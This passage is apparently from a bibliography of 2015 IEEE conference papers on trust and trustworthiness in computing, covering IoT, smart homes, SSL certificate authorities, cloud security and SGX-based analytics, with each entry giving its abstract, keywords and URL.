Abstract: Moving towards a hyperconnected society in the forthcoming "zettabyte" era requires a trusted ICT infrastructure for sharing information and creating knowledge. To advance the efforts to build converged ICT services and reliable information infrastructures, ITU-T has recently started a work item on future trusted ICT infrastructures. In this paper, we introduce the concept of a social-cyber-physical infrastructure from the social Internet of Things paradigm and present different meanings from various perspectives for a clear understanding of trust. Then, the paper identifies key challenges for a trustworthy ICT infrastructure. Finally, we propose a generic architectural framework for trust provisioning and presents strategies to stimulate activities for future standardization on trust with related standardization bodies.

Keywords: standardisation; trusted computing; ITU-T; converged ICT services; information and communication technology; social Internet-of-Things paradigm; social-cyber-physical infrastructure; standardization; trust provisioning; trusted ICT infrastructure; zettabyte era; Cloud computing; Interconnected systems; Internet of things; Reliability; Security; Standardization; Telecommunications; ICT; Internet of Things; Trust; social-cyber-physical infrastructure (ID#: 16-9431)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7383628&isnumber=7383613

 

Jin-Hee Han, Yongsung Jeon and Jeongnyeo Kim, "Security Considerations for Secure and Trustworthy Smart Home System in the IoT Environment," Information and Communication Technology Convergence (ICTC), 2015 International Conference on, Jeju, 2015, pp. 1116-1118. doi: 10.1109/ICTC.2015.7354752

Abstract: Recently, smart home appliances and wearable devices have been developed through many companies. Most devices can be interacted with various sensors, have communication function to connect the Internet by themselves. Those devices will provide a wide range of services to users through a mutual exchange of information. However, due to the nature of the IoT environment, the appropriate security functions for secure and trustworthy smart home service should be applied extensively because the security threats will be increased and impact of security threats is likely to be expanded. Therefore, in this paper, we describe specifically the security requirements of the components that make up the smart home system.

Keywords: Internet; Internet of Things; computer network security; home automation; trusted computing; Internet; IoT environment; information mutual exchange; secure smart home system; security threat; smart home appliance; trustworthy smart home system; wearable device; Authentication; Data privacy; Internet of things; Logic gates; Servers; Smart homes; IoT; requirements; security; smart home system (ID#: 16-9432)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7354752&isnumber=7354472

 

A. A. Gendreau, "Situation Awareness Measurement Enhanced for Efficient Monitoring in the Internet of Things," Region 10 Symposium (TENSYMP), 2015 IEEE, Ahmedabad, 2015, pp. 82-85. doi: 10.1109/TENSYMP.2015.13

Abstract: The Internet of Things (IoT) is a heterogeneous network of objects that communicate with each other and their owners over the Internet. In the future, the utilization of distributed technologies in combination with their object applications will result in an unprecedented level of knowledge and awareness, creating new business opportunities and expanding existing ones. However, in this paradigm where almost everything can be monitored and tracked, an awareness of the state of the monitoring systems' situation will be important. Given the anticipated scale of business opportunities resulting from new object monitoring and tracking capabilities, IoT adoption has not been as fast as expected. The reason for the slow growth of application objects is the immaturity of the standards, which can be partly attributed to their unique system requirements and characteristics. In particular, the IoT standards must exhibit efficient self-reliant management and monitoring capability, which in a hierarchical topology is the role of cluster heads. IoT standards must be robust, scalable, adaptable, reliable, and trustworthy. These criteria are predicated upon the limited lifetime, and the autonomous nature, of wireless personal area networks (WPANs), of which wireless sensor networks (WSNs) are a major technological solution and research area in the IoT. In this paper, the energy efficiency of a self-reliant management and monitoring WSN cluster head selection algorithm, previously used for situation awareness, was improved upon by sharing particular established application cluster heads. This enhancement saved energy and reporting time by reducing the path length to the monitoring node. Also, a proposal to enhance the risk assessment component of the model is made. We demonstrate through experiments that when benchmarked against both a power and randomized cluster head deployment, the proposed enhancement to the situation awareness metric used less power. Potentially, this approac- can be used to design a more energy efficient cluster-based management and monitoring algorithm for the advancement of security, e.g. Intrusion detection systems (IDSs), and other standards in the IoT.

Keywords: Internet of Things; personal area networks; security of data; wireless sensor networks; Internet of Things; WPAN; WSN; distributed technologies; efficient self-reliant management and monitoring capability; heterogeneous network; object monitoring and tracking capabilities; situation awareness measurement; situation awareness metric; wireless personal area networks; wireless sensor networks; Energy efficiency; Internet of things; Monitoring; Security; Standards; Wireless sensor networks; Internet of Things; Intrusion detection system; Situational awareness; Wireless sensor networks (ID#: 16-9433)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7166243&isnumber=7166213

 

R. Gupta and R. Garg, "Mobile Applications Modelling and Security Handling in Cloud-Centric Internet of Things," Advances in Computing and Communication Engineering (ICACCE), 2015 Second International Conference on, Dehradun, 2015, pp. 285-290. doi: 10.1109/ICACCE.2015.119

Abstract: The Mobile Internet of Things (IoT) applications are already a part of technical world. The integration of these applications with Cloud can increase the storage capacity and help users to collect and process their personal data in an organized manner. There are a number of techniques adopted for sensing, communicating and intelligently transmitting data from mobile devices onto the Cloud in IoT applications. Thus, security must be maintained while transmission. The paper outlines the need for Cloud-centric IoT applications using Mobile phones as the medium for communication. Overview of different techniques to use Mobile IoT applications with Cloud has been presented. Majorly four techniques namely Mobile Sensor Data Processing Engine (MOSDEN), Mobile Fog, Embedded Integrated Systems (EIS) and Dynamic Configuration using Mobile Sensor Hub (MosHub) are discussed and few of the similarities and comparisons between them is mentioned. There is a need to maintain confidentiality and security of the data being transmitted by these methodologies. Therefore, cryptographic mechanisms like Public Key Encryption (PKI)and Digital certificates are used for data mechanisms like Public Key Encryption (PKI) and Digital certificates are used for data management (TSCM) allows trustworthy sensing of data for public in IoT applications. The above technologies are used to implement an application called Smart Helmet by us to bring better understanding of the concept of Cloud IoT and support Assisted Living for the betterment of the society. Thus the Applications makes use of Nordic BLE board transmission and stores data onto the Cloud to be used by large number of people.

Keywords: Internet of Things; cloud computing; data acquisition; embedded systems; mobile computing; public key cryptography; trusted computing; EIS; MOSDEN; MosHub; Nordic BLE board transmission; PKI; Smart Helmet; TSCM; assisted living;cloud-centric Internet of Things; cloud-centric IoT applications; communication; cryptographic mechanisms; data confidentiality; data management; data mechanisms; data security; data transmission; digital certificates; dynamic configuration; embedded integrated systems; mobile Internet of Things; mobile IoT applications; mobile applications modelling; mobile devices; mobile fog; mobile phones; mobile sensor data processing engine; mobile sensor hub; personal data collection; personal data processing; public key encryption; security handling; sensing; storage capacity; trustworthy data; Bluetooth; Cloud computing; Mobile applications; Mobile communication; Mobile handsets; Security; Cloud IoT; Embedded Integrated Systems; Internet of Things; Mobile Applications; Mobile Sensor Data Processing Engine; Mobile Sensor Hub; Nordic BLE board; Public Key Encryption; Smart Helmet (ID#: 16-9434)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7306695&isnumber=7306547

 

B. Mok et al., "Emergency, Automation Off: Unstructured Transition Timing for Distracted Drivers of Automated Vehicles," Intelligent Transportation Systems (ITSC), 2015 IEEE 18th International Conference on, Las Palmas, 2015, pp. 2458-2464. doi: 10.1109/ITSC.2015.396

Abstract: In future automated driving systems, drivers will be free to perform other secondary tasks, not needing to stay vigilant in monitoring the car's activity. However, there will still be situations in which drivers are required to take-over control of the vehicle, most likely from a highly distracted state. While highly automated vehicles would ideally accommodate structured takeovers, providing ample time and warning, it is still very important to examine how drivers would behave when they are subjected to an unstructured emergency transition of control. In this study, we observed how participants (N=30) in a driving simulator performed after they experienced a loss of automation. We tested three transition time conditions, with an unstructured transition of control occurring 2 seconds, 5 seconds, or 8 seconds before the participants encountered a road hazard that required the drivers' intervention. Participants were given a passive distraction (watching a video) to do while the automated driving mode was enabled, so they needed to disengage from the task and regain control of the car when the transition occurred. Few drivers in the 2 second condition were able to safely negotiate the road hazard situation, while the majority of drivers in the 5 or 8 second conditions were able to navigate the hazard safely. Similarly, drivers in the 2 second condition rated the vehicle to be less trustworthy than drivers in the 5 and 8 second conditions. From the study results, we are able to narrow down a minimum amount of time in which drivers can take over the control of vehicle safely and comfortably from the automated system in the advent of an impending road hazard.

Keywords: automobiles; digital simulation; driver information systems ;traffic engineering computing; automated driving systems; automated vehicles; distracted drivers; driving simulator; passive distraction; road hazard situation; transition time conditions; unstructured emergency transition; unstructured transition timing; vehicle control; Automation; Hazards; Poles and towers; Roads; Standards; Vehicles; Wheels; Autonomous Driving Simulation; Controlled Study; Driving Performance; Human Factors; Transition of Control (ID#: 16-9435)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7313488&isnumber=7312804

 

M. Shiomi and N. Hagita, "Social Acceptance of a Childcare Support Robot System," Robot and Human Interactive Communication (RO-MAN), 2015 24th IEEE International Symposium on, Kobe, 2015, pp. 13-18. doi: 10.1109/ROMAN.2015.7333658

Abstract: This paper investigates people's social acceptance of a childcare support robot system and compares their attitudes to two childcare technologies: anesthesia during labor and baby food (processed food and formula milk), which includes powdered milk and instant food for babies and toddlers. To investigate their social acceptance, we developed scales from three points of view: safety and trustworthy, diligence, and decreasing workload. For this paper, our participants were comprised of 412 people located through a web-based survey and 14 people who experienced the prototype of our childcare support robot system. They answered questionnaires about our three developed scales and an intention to use scale to investigate their social acceptance toward childcare support technologies. The web-based survey results indicate that our system's concept was evaluated lower than current childcare support technologies, but people who experienced our system prototype evaluated it higher than those who filled out web-based surveys.

Keywords: human factors; human-robot interaction; medical robotics; service robots; anesthesia; baby food; childcare support robot system; childcare support technologies; childcare technologies; instant food for babies; people social acceptance; powdered milk; social acceptance; toddlers; Anesthesia; Dairy products; Pediatrics; Prototypes; Robot sensing systems; Safety (ID#: 16-9436)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7333658&isnumber=7333553

 

L. Gu, M. Zhou, Z. Zhang, M. C. Shan, A. Zhou and M. Winslett, "Chronos: An Elastic Parallel Framework for Stream Benchmark Generation and Simulation," Data Engineering (ICDE), 2015 IEEE 31st International Conference on, Seoul, 2015, pp. 101-112. doi: 10.1109/ICDE.2015.7113276

Abstract: In the coming big data era, stress test to IT systems under extreme data volume is crucial to the adoption of computing technologies in every corner of the cyber world. Appropriately generated benchmark datasets provide the possibility for administrators to evaluate the capacity of the systems when real datasets hard obtained have not extreme cases. Traditional benchmark data generators, however, mainly target at producing relation tables of arbitrary size following fixed distributions. The output of such generators are insufficient when it is used to measure the stability of the architecture with extremely dynamic and heavy workloads, caused by complicated/hiden factors in the generation mechanism of real world, e.g. dependency between stocks in the trading market and collaborative human behaviors on the social network. In this paper, we present a new framework, called Chronos, to support new demands on streaming data benchmarking, by generating and simulating realistic and fast data streams in an elastic manner. Given a small group of samples with timestamps, Chronos reproduces new data streams with similar characteristics of the samples, preserving column-wise correlations, temporal dependency and order statistics of the snapshot distributions at the same time. To achieve such realistic requirements, we propose 1) a column decomposition optimization technique to partition the original relation table into small sub-tables with minimal correlation information loss, 2) a generative and extensible model based on Latent Dirichlet Allocation to capture temporal dependency while preserving order statistics of the snapshot distribution, and 3) a new generation and assembling method to efficiently build tuples following the expected distribution on the snapshots. To fulfill the vision of elasticity, we also present a new parallel stream data generation mechanism, facilitating distributed nodes to collaboratively generate tuples with minimal synchronization overhead and excellent load balancing. Our extensive experimental studies on real world data domains confirm the efficiency and effectiveness of Chronos on stream benchmark generation and simulation.

Keywords: Big Data; optimisation; parallel processing; program assemblers; resource allocation; Big Data; Chronos framework; IT systems; assembling method; benchmark data generators; collaborative human behaviors; column decomposition optimization technique; column-wise correlations; cyber world; elastic parallel framework; extreme data volume; fast data streams; latent Dirichlet allocation; load balancing; minimal correlation information loss; minimal synchronization overhead; order statistics; parallel stream data generation mechanism; snapshot distributions; social network; stream benchmark generation; temporal dependency; timestamps; trading market; Benchmark testing; Complexity theory; Computational modeling; Correlation; Distributed databases; Generators (ID#: 16-9437)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7113276&isnumber=7113253

 

R. A. Earnshaw, M. D. Silva and P. S. Excell, "Ten Unsolved Problems with the Internet of Things," 2015 International Conference on Cyberworlds (CW), Visby, 2015, pp. 1-7. doi: 10.1109/CW.2015.28

Abstract: It is estimated that by 2020 that the Internet of Things with embedded and wearable computing will have a major impact on society and be providing beneficial services in a wide variety of applications. It has already accomplished some cost savings in operations and increases in asset efficiency. Increased connectivity and improved safety, security, and reliability are expected to increase potential value in a range of applications from healthcare to transportation. As much of the technology is embedded and invisible it can have the role of a smart assistant working away autonomously and unobtrusively in the background. However, automatic monitoring of activities brings increased potential invasion of personal spaces and personal data. There are significant issues in a number of areas which still have to be addressed in order to ensure safe, reliable and trustworthy systems. A prototype funded by the UK Technology Strategy Board demonstrates the value and advantages of business to business collaboration via the Internet. It also emphasizes the benefits of connectivity and its contribution to sustainability.

Keywords: Internet of Things; business data processing; data privacy; security of data; trusted computing; IlK Technology Strategy Board; Internet; Internet of Things; asset efficiency; automatic activity monitoring; business-to-business collaboration; connectivity improvement; cost saving; personal data; personal spaces; reliability improvement; safety improvement; security improvement; smart assistant; Collaboration; Companies; Internet of things; Monitoring; Real-time systems; big data; business to business collaboration; embedded systems; implanted devices; interoperability; latency; open standards; predictive analytics; privacy; real-time monitoring; security; trust; visual analytics (ID#: 16-9438)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7398383&isnumber=7398373

 

T. Fadai, S. Schrittwieser, P. Kieseberg and M. Mulazzani, "Trust me, I'm a Root CA! Analyzing SSL Root CAs in Modern Browsers and Operating Systems," Availability, Reliability and Security (ARES), 2015 10th International Conference on, Toulouse, 2015, pp. 174-179. doi: 10.1109/ARES.2015.93

Abstract: The security and privacy of our online communications heavily relies on the entity authentication mechanisms provided by SSL. Those mechanisms in turn heavily depend on the trustworthiness of a large number of companies and governmental institutions for attestation of the identity of SSL services providers. In order to offer a wide and unobstructed availability of SSL-enabled services and to remove the need to make a large amount of trust decisions from their users, operating systems and browser manufactures include lists of certification authorities which are trusted for SSL entity authentication by their products. This has the problematic effect that users of such browsers and operating systems implicitly trust those certification authorities with the privacy of their communications while they might not even realize it. The problem is further complicated by the fact that different software vendors trust different companies and governmental institutions, from a variety of countries, which leads to an obscure distribution of trust. To give insight into the trust model used by SSL this thesis explains the various entities and technical processes involved in establishing trust when using SSL communications. It furthermore analyzes the number and origin of companies and governmental institutions trusted by various operating systems and browser vendors and correlates the gathered information to a variety of indexes to illustrate that some of these trusted entities are far from trustworthy. Furthermore it points out the fact that the number of entities we trust with the security of our SSL communications keeps growing over time and displays the negative effects this might have as well as shows that the trust model of SSL is fundamentally broken.

Keywords: certification; cryptographic protocols; data privacy; message authentication; online front-ends; operating systems (computers);trusted computing; CAs; SSL communications; SSL entity authentication; SSL root; SSL-enabled services; browsers; certification authorities; entity authentication mechanisms; online communications; operating systems; privacy; root certificate programs; security; trust model; Browsers; Companies; Government; Indexes; Internet; Operating systems; Security; CA; PKI; trust (ID#: 16-9439)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7299911&isnumber=7299862

 

Jingyao Fan, Qinghua Li and Guohong Cao, "Privacy-Aware and Trustworthy Data Aggregation in Mobile Sensing," Communications and Network Security (CNS), 2015 IEEE Conference on, Florence, 2015, pp. 31-39. doi: 10.1109/CNS.2015.7346807

Abstract: With the increasing capabilities of mobile devices such as smartphones and tablets, there are more and more mobile sensing applications such as air pollution monitoring and healthcare. These applications usually aggregate the data contributed by mobile users to infer about people's activities or surroundings. Mobile sensing can only work properly if the data provided by users is adequate and trustworthy. However, mobile users may not be willing to submit data due to privacy concerns, and they may be malicious and submit forged data to cause damage to the system. To address these problems, this paper proposes a novel privacy-aware and trustworthy data aggregation protocol for mobile sensing. Our protocol allows the server to aggregate the data submitted by mobile users without knowing the data of individual user. At the same time, if malicious users submit invalid data, they will be detected or the polluted aggregation result will be rejected by the server. In this way, the malicious users' effect on the aggregation result is effectively limited. The detection of invalid data works even if multiple malicious users collude. Security analysis shows that our scheme can achieve the trustworthy and privacy preserving goals, and experimental results show that our scheme has low computation cost and low power consumption.

Keywords: data privacy; mobile handsets; protocols; telecommunication security; trusted computing; invalid data detection; mobile device; mobile sensing; power consumption; privacy-aware data aggregation protocol; security analysis; trustworthy data aggregation protocol; Aggregates; Data privacy; Manganese; Mobile communication; Protocols; Sensors; Servers (ID#: 16-9440)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7346807&isnumber=7346791

 

J. Singh, T. F. J. M. Pasquier and J. Bacon, "Securing Tags to Control Information Flows within the Internet of Things," Recent Advances in Internet of Things (RIoT), 2015 International Conference on, Singapore, 2015, pp. 1-6. doi: 10.1109/RIOT.2015.7104903

Abstract: To realise the full potential of the Internet of Things (loT), loT architectures are moving towards open and dynamic interoperability, as opposed to closed application silos. This is because functionality is realised through the interactions, i.e. the exchange of data, between a wide-range of 'things'. Data sharing requires management. Towards this, we are exploring distributed, decentralised Information Flow Control (IFC) to enable controlled data flows, end-to-end, according to policy. In this paper we make the case for IFC, as a data-centric control mechanism, for securing loT architectures. Previous research on IFC focuses on a particular system or application, e.g. within an operating system, with little concern for wide-scale, dynamic systems. To render IFC applicable to loT, we present a certificate-based model for secure, trustworthy policy specification, that also reflects real-world loT concerns such as 'thing' ownership. This approach enables decentralised, distributed, verifiable policy specification, crucial for securing the wide-ranging, dynamic interactions of future loT applications.

Keywords: Internet of Things; telecommunication control; telecommunication security; Internet of Things; data-centric control mechanism; information flow control; loT architectures; Production; Reliability; Certificates; Distributed Systems; Information Flow Control; Internet of Things; PKI; Privacy; Security (ID#: 16-9441)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7104903&isnumber=7104893

 

S. Chaudhary and R. Nath, "A New Template Protection Approach for Iris Recognition," Reliability, Infocom Technologies and Optimization (ICRITO) (Trends and Future Directions), 2015 4th International Conference on, Noida, 2015, pp. 1-6. doi: 10.1109/ICRITO.2015.7359306

Abstract: Biometric recognition systems, which rely on physical and behavioral features of the human body to recognize a human-being, are used in various areas that require a high degree of security. Among different biometric recognition methods, iris recognition is measured as being the most trustworthy, distinct, consistent, and stable option. Template security is an important aspect of a biometric system. It necessitates the development of an approach that ensures user security and privacy. In this paper, an approach based on steganography is proposed to protect the iris template. Random number based embedding is used in LSB (Least Significant Bit) steganography to enhance security. To provide more security, bits are embedded into LSB's of blue pixel only. The IrisCode bits are embedded across three least significant bits randomly. The resulting template is more secure as original biometric data is not stored in the database rather it is stored after embedding in cover image. The performance of the proposed approach is evaluated and found to be better in terms of Peak Signal to Noise Ratio (PSNR) value, histogram plot and Receiver Operating Characteristic (ROC) curve plot.

Keywords: biometrics (access control); embedded systems; iris recognition; sensitivity analysis; steganography; LSB steganography; PSNR value; ROC curve; behavioral feature; biometric recognition system; iris recognition; least significant bit steganography; peak signal-to-noise ratio value; random number-based embedding; receiver operating characteristic curve; template protection approach; template security; Databases; Feature extraction; Image color analysis; Iris recognition; Security; Transforms; Hamming distance; Iris recognition; IrisCode; Least significant bit substitution; Receiver operating characteristic curve; Steganography (ID#: 16-9442)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7359306&isnumber=7359191

 

S. Benabied, A. Zitouni and M. Djoudi, "A Cloud Security Framework Based on Trust Model and Mobile Agent," Cloud Technologies and Applications (CloudTech), 2015 International Conference on, Marrakech, 2015, pp. 1-8. doi: 10.1109/CloudTech.2015.7336962

Abstract: Cloud computing as a potential paradigm offers tremendous advantages to enterprises. With the cloud computing, the market's entrance time is reduced, computing capabilities is augmented and computing power is really limitless. Usually, to use the full power of cloud computing, cloud users has to rely on external cloud service provider for managing their data. Nevertheless, the management of data and services are probably not fully trustworthy. Hence, data owners are uncomfortable to place their sensitive data outside their own system .i.e., in the cloud., Bringing transparency, trustworthiness and security in the cloud model, in order to fulfill client's requirements are still ongoing. To achieve this goal, our paper introduces two levels security framework: Cloud Service Provider (CSP) and Cloud Service User (CSU). Each level is responsible for a particular task of the security. The CSU level includes a proxy agent and a trust agent, dealing with the first verification. Then a second verification is performed at the CSP level. The framework incorporates a trust model to monitor users' behaviors. The use of mobile agents will exploit their intrinsic features such as mobility, deliberate localization and secure communication channel provision. This model aims to protect user's sensitive information from other internal or external users and hackers. Moreover, it can detect policy breaches, where the users are notified in order to take necessary actions when malicious access or malicious activity would occur.

Keywords: cloud computing; mobile agents; security of data; trusted computing; CSP; CSU; cloud computing; cloud security framework; cloud service provider; cloud service user; data management; mobile agent; policy breach detection; proxy agent; trust agent; trust model; two levels security framework; Cloud computing; Companies; Computational modeling; Mobile agents; Monitoring; Security; Servers; Cloud Computing Security; Cloud computing; Mobile Agent; Security and Privacy; Trust; Trust Model; cloud service provider (ID#: 16-9443)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336962&isnumber=7336956

 

F. Akram and R. P. Rustagi, "An Efficient Approach Towards Privacy Preservation and Collusion Resistance Attendance System," MOOCs, Innovation and Technology in Education (MITE), 2015 IEEE 3rd International Conference on, Amritsar, 2015, pp. 41-45. doi: 10.1109/MITE.2015.7375285

Abstract: Every organization whether it be an enterprise or academic institute, should maintain a proper documentation of attendance of staff or students for effective functioning of their organization. Generally there are two methods of taking attendance in a classroom- calling out students name one by one or taking students signature on paper. However each of those strategies are time consuming, inefficient and moreover proxy can be easily given by students if strength of class is large since it is not possible to verify each student in person. A good amount of the time is wasted in taking attendance and even then many times attendance don't seem to be marked properly. Proxy of students in classroom is a perpetual problem that has to be addressed. Therefore an attendance management system is required which not only authenticates the student but also detect proxies. In this paper we combine privacy preservation and collusion resistance to propose an attendance system which uses an android application to mark student's attendance in the classroom and detect proxies given by students. It exploits the Bluetooth technology to ensure student is present in class itself rather than in the canteen or in the library. Based on the attendance given by students, a trust factor is assigned to each student to determine how trustworthy a student is.

Keywords: Bluetooth; data privacy; educational institutions; Bluetooth technology; android application; collusion resistance attendance management system; perpetual problem; privacy preservation; student attendance marking; student authentication; student proxy detection; student trustworthiness; trust factor; Bluetooth; Databases; Fingerprint recognition; Organizations; Privacy; Servers; Smart phones; Bluetooth Scanning; Collusion Avoidance; Privacy; Trust Factor (ID#: 16-9444)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7375285&isnumber=7375274

 

J. Classen, J. Braun, F. Volk, M. Hollick, J. Buchmann and M. Muhlhauser, "A Distributed Reputation System for Certification Authority Trust Management," Trustcom/BigDataSE/ISPA, 2015 IEEE, Helsinki, 2015, pp. 1349-1356. doi: 10.1109/Trustcom.2015.529

Abstract: In the current Web Public Key Infrastructure (Web PKI), few central instances have the power to make trust decisions. From a system's perspective, it has the side effect that every Certification Authority (CA) becomes a single point of failure (SPOF). In addition, trust is no individual matter per user, what makes trust decisions hard to revise. Hence, we propose a method to leverage Internet users and thus distribute CA trust decisions. However, the average user is unable to manually decide which incoming TLS connections are trustworthy and which are not. Therefore, we overcome this issue with a distributed reputation system that facilitates sharing trust opinions while preserving user privacy. We assess our methodology using real-world browsing histories. Our results exhibit a significant attack surface reduction with respect to the current Web PKI, and at the same time we only introduce a minimal overhead.

Keywords: Internet; data privacy; decision making; public key cryptography; trusted computing; CA trust decision; Internet users; SPOF;TLS connections; Web PKI; Web public key infrastructure; attack surface reduction; certification authority trust management; distributed reputation system; single point of failure; trust decision making; trust opinion sharing; user privacy preservation; History Internet; Peer-to-peer computing; Privacy; Protocols; Routing; Security; Web PKI; distributed system; trust management (ID#: 16-9445)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7345437&isnumber=7345233

 

C. L. Claiborne, C. Ncube and R. Dantu, "Random Anonymization of Mobile Sensor Data: Modified Android Framework," Intelligence and Security Informatics (ISI), 2015 IEEE International Conference on, Baltimore, MD, 2015, pp. 182-184. doi: 10.1109/ISI.2015.7165968

Abstract: With the increasing ability to accurately classify activities of mobile users from what was once viewed as innocuous mobile sensor data, the risk of users compromising their privacy has risen exponentially. Currently, mobile owners cannot control how various applications handle the privacy of their sensor data, or even determine if a service provider is adversarial or trustworthy. To address these privacy concerns, third party applications have been designed to allow mobile users to have control over the data that is sent to service providers. However, these applications require users to set flags and parameters that place restrictions on the anonymized or real sensor data that is sent to the requestor. Therefore, in this paper, we introduce a new framework, RANDSOM, that moves the decision-making from the application level to the operating system level.

Keywords: data privacy; mobile computing; smart phones; telecommunication security; RANDSOM framework; application level; mobile sensor data; mobile users; modified Android framework; operating system level; privacy concerns; random anonymization; sensor data privacy; service providers; third party applications; Accelerometers; Data models; Data privacy; Hidden Markov models; Mobile communication; Privacy; Smart phones; Android; RANDSOM; anonymized; pervasive; privacy; provider; smart phone (ID#: 16-9446)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7165968&isnumber=7165923

 

K. Thakker, Chung-Horng Lung and P. Morde, "Secure and Optimal Content-centric Networking Caching Design," Trustworthy Systems and Their Applications (TSA), 2015 Second International Conference on, Hualien, 2015, pp. 36-43. doi: 10.1109/TSA.2015.17

Abstract: Due to accretion demand and size of the contents makes today's Internet architecture inefficient. This host centric model does not seem effective to cater current communication needs where users focus on desired content. As a result, translation between content information and networking domain should take place, typically consisting of an establishment of a delivery path between the content provider and the content consumer. This translation is generally an inefficient constraint, as data location and data popularity are neglected, which leads to over consumption of network resources. The increasing demands of highly scalable and efficient distribution of contents have motivated the development of future Internet architecture based on named data objects. Currently, Content Centric Networking (CCN) is gaining attention as the future Internet architecture where contents themselves are the primary focus, rather than the location of the content. This paper provides an insight into efficient caching management policies used currently for large file caching, our proposed approach along with its justification and validation behind the idea for designing the best caching strategy in CCN. However, caching policies can be misused if attackers use cache as storage to make their own content available for attacks or privacy leaks. We conclude with the need for security mechanisms for protecting the cache and the security measures to prevent any misuse of it.

Keywords: Internet; cache storage; data privacy; security of data; CCN; Internet architecture; host centric model; named data objects; network resource over-consumption; optimal content-centric networking caching design; privacy leaks; secure content-centric networking caching design; Computer architecture; Computers; Internet; Mathematical model; Privacy; Routing protocols; Security; Content delivery networking (CDN); Content-centric networking (CCN); caching; peer-assisted content delivery; software defined networking (SDN) (ID#: 16-9447)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7335942&isnumber=7335925

 

J. Bushey, "Trustworthy Citizen-Generated Images and Video on Social Media Platforms," System Sciences (HICSS), 2015 48th Hawaii International Conference on, Kauai, HI, 2015, pp. 1553-1564. doi: 10.1109/HICSS.2015.189

Abstract: The convergence of digital cameras into mobile phones with Internet connectivity and the proliferation of social media platforms for accessing, sharing, managing and storing digital images and videos has transformed news reportage and provided the opportunity for citizen journalists to capture and disseminate visual documentation, which shapes contemporary events, informs future decisions and over time, becomes part of the historical record and societal memory. Or does it? What are the obstacles to ongoing access and long-term preservation of citizen-generated content in social media platforms? This paper provides a multidisciplinary approach to exploring the trustworthiness of online content, utilizing literature from the fields of journalism and the law, as well as findings from archival studies on record-making and recordkeeping in the digital environment. Recommendations to citizen journalists are provided to assist in the capture and storage of trustworthy digital images in social media platforms.

Keywords: Internet; cameras; mobile handsets; social networking (online);trusted computing; Internet connectivity; digital cameras; mobile phones; social media platforms; trustworthy citizen-generated images; trustworthy citizen-generated video; visual documentation; Digital images; Law; Media; Privacy; Reliability; Visualization; Authenticity; Citizen Journalism; Digital Images; Legal Evidence; Social Media; Trustworthiness (ID#: 16-9448)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7069999&isnumber=7069647

 

M. Javanmard, M. A. Salehi and S. Zonouz, "TSC: Trustworthy and Scalable Cytometry," High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, New York, NY, 2015, pp. 1356-1360. doi: 10.1109/HPCC-CSS-ICESS.2015.125

Abstract: Accurate flow cytometry analyses for disease diagnosis purposes requires powerful computational and storage resources that are rarely available in clinical settings. The emerging high-performance cloud computing technologies could potentially address the above-mentioned scalability challenge, however, potentially untrusted cloud infrastructures increases the security and privacy concerns significantly as the attackers may gain knowledge about the patient identity and medical information and affect the consequent course of treatment. In this paper, we present TSC, a trustworthy scalable Cloud-based solution to provide remote cytometry analysis capabilities. TSC enables the medical laboratories to upload the acquired high-frequency raw measurements to the cloud for remote cytometry analysis with high-confidence data security guarantees. In particular, using fundamental cryptographic security solutions, such as the trusted platform module framework, TSC eliminates any possibility of unauthorized sensitive patient data exfiltration to untrusted parties, e.g., malicious or compromised cloud providers. Our evaluation results show that TSC effectively facilitates scalable and efficient disease diagnoses while preserving the patient privacy and treatment correctness.

Keywords: cloud computing; cryptography; data privacy; diseases; medical information systems; patient diagnosis; patient treatment; trusted computing; TSC; computational resources; disease diagnosis; flow cytometry analysis; fundamental cryptographic security solutions; high-confidence data security; high-frequency raw measurements; high-performance cloud computing technologies; medical information; patient privacy; patient treatment correctness; remote cytometry analysis; remote cytometry analysis capabilities; scalability challenge; storage resources; trusted platform module framework; trustworthy scalable could-based solution; unauthorized sensitive patient data exfiltration; untrusted cloud infrastructures; untrusted parties; Cloud computing; Cryptography; Diseases; Electrodes; Proteins; Sensors; Cloud computing; Cytometry; Security; Trusted Platform Module (TPM) (ID#: 16-9449)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336356&isnumber=7336120

 

F. Schuster et al., "VC3: Trustworthy Data Analytics in the Cloud Using SGX," Security and Privacy (SP), 2015 IEEE Symposium on, San Jose, CA, 2015, pp. 38-54. doi: 10.1109/SP.2015.10

Abstract: We present VC3, the first system that allows users to run distributed MapReduce computations in the cloud while keeping their code and data secret, and ensuring the correctness and completeness of their results. VC3 runs on unmodified Hadoop, but crucially keeps Hadoop, the operating system and the hyper visor out of the TCB, thus, confidentiality and integrity are preserved even if these large components are compromised. VC3 relies on SGX processors to isolate memory regions on individual computers, and to deploy new protocols that secure distributed MapReduce computations. VC3 optionally enforces region self-integrity invariants for all MapReduce code running within isolated regions, to prevent attacks due to unsafe memory reads and writes. Experimental results on common benchmarks show that VC3 performs well compared with unprotected Hadoop: VC3's average runtime overhead is negligible for its base security guarantees, 4.5% with write integrity and 8% with read/write integrity.

